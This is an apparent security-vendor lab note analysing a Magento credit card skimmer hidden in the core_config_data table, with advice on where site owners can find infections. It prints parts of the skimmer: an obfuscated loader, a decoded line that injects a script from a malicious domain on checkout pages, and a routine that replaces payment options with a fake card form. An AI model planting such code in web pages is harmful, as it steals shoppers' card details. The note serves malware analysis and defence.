Mage.js CC Stealer. The Database Version.

Labs Note

Every day we find many Magento credit card stealers injected into different files: modules, core files, themes. Magento database is not an an exception.

For example, this credit card stealer was found in the core_config_data table. The obfuscated database injection begins with the following code:

<script>var _0x7539=["x6Cx6Fx63x61x74x69x6Fx6E","x74x65x73x74","x6Fx6Ex65x70x61x67x65x7Cx63x68x65...x6Fx6Ex65x73x74x65x70x7Cx66x69x72x65x63x68x65x63x6Bx6Fx75x74"...

It loads an external script from js-save .link/js-save/mage.js into pages with payment forms to intercept data entered there.

var _0x7539=["location","test","onepage|checkout|onestep|firecheckout","<script src="https://js-save .link/js-save/mage.js"></script>...

The mage.js code sends intercepted data to the mag.php script on the same malicious js-save .link site.

The injected script has one more part (also encrypted). It prepares the payment form for data theft. Here is the decoded second part of the DB injection:

setInterval(function() {  if (!document.getElementById("payment_form_ccsave")) {     ShowForm("checkout-payment-method-load")   }}, 100);function ShowForm(elem) {  if (document.getElementById(elem)) {        var node = document.getElementById(elem);       while (node.firstChild) {           node.removeChild(node.firstChild)       };              node.insertAdjacentHTML("beforeend", htmlCCForm)  }}

This code checks if the payment form has the “pay with credit card” method. If it is absent, it adds this method (and the corresponding hardcoded HTML form) to the “checkout-payment-method-load” page element and removes all other payment methods to increase chances of victims choosing to enter their credit card details in the form. Once the form is prepared, the script from js-save .link will be able to successfully steal entered data.

This attack a new version of the attacks that previously used the js/lib/ccard.js file to inject similar scripts (usually not obfuscated). Back then they used the jquery-cdn . top and statsdot. eu domains.

Since this attack modifies the payment form, some infected sites may experience problems with payments. If your customers report that payment form won’t work or have strange behavior, it may be a sign of infection and you need to thoroughly check all files and the database. Pay a special attention to files like: app/code/core/Mage/Payment/Model/Method/Cc.php and js/lib/ccard.js, and to the design/head/includes rows of the core_config_data table. You might also want to check the Ecommerce Security section of our blog where we regularly share details of attacks on ecommerce sites.

If your site is hacked and you need help in cleaning it, or you just want it to be regularly monitored for all sorts of security problems, make sure to check our Website AntiVirus service.

You May Also Like